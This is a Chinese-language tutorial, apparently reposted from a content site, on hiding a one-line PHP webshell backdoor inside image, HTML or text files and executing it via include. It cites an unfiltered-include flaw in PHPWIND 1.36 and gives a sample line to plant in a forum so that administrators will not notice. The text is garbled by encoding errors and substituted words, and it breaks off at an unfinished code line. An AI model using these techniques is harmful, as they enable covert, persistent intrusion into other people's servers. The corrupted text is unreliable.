最近很多朋友都在問我是否能把我那一句話安全隱藏到HTML或圖片里，其實把一句話安全插入到PHP文件中就已經(jīng)很隱蔽了，如果說硬是要放到HTML文件或圖片里，就接著往下看的這篇測試報告吧，

教你巧妙隱藏PHP文件后門

。

    要知道如果光把PHP語句放到圖片里是無論如何也不能執(zhí)行的，因為PHP只解析擴展名為php的文件。所以說要能使隱藏在圖片里的PHP語句執(zhí)行。我們就的借助PHP中的調用函數(shù) ：include 、require 等。

    我們還記得前些日子把安全隱藏到圖片的文章吧。也就是在PHP文件里用include("x.gif")這樣的語句來調用隱藏在圖片的安全語句。ASP中語句也類似�？此品浅ｋ[蔽但直接調用圖片對稍微懂點PHP的人就不難發(fā)現(xiàn)可疑之處。由于URL 里用GET方式很難傳遞參數(shù)，這就使得插入安全的性能得不到發(fā)揮。

    Include 函數(shù)在PHP中使用的比較頻繁，所以引起的安全問題也實在太多，例如PHPWIND1.36的漏洞就是因為include后面的變量沒做過濾引起的，

電腦資料

《教你巧妙隱藏PHP文件后門》(http://www.msguai.com)。由此我們就可以構造類似的語句來插入到PHP文件中。然后把安全隱藏到圖片或HTML文件里，可以說隱蔽性就更高了。如在PHPWIND論壇里插入下面的語句：

    ＜‘’？@include includ/.$PHPWIND_ROOT；？ ＞[Copy to clipboard]

    一般管理員是無法看出來的。

    有了include 函數(shù)來輔助幫忙我們就可以把PHP安全隱藏到 諸如 txt、html和圖片文件等很多類型的文件里來了。因為txt、html和圖片文件這三種類型的文件最無論在論壇還是文章系統(tǒng)里是最為常見的了，下面我們就依次來做測試。

    首先建立一PHP文件test.php 文件內(nèi)容為:

    CODE：$test=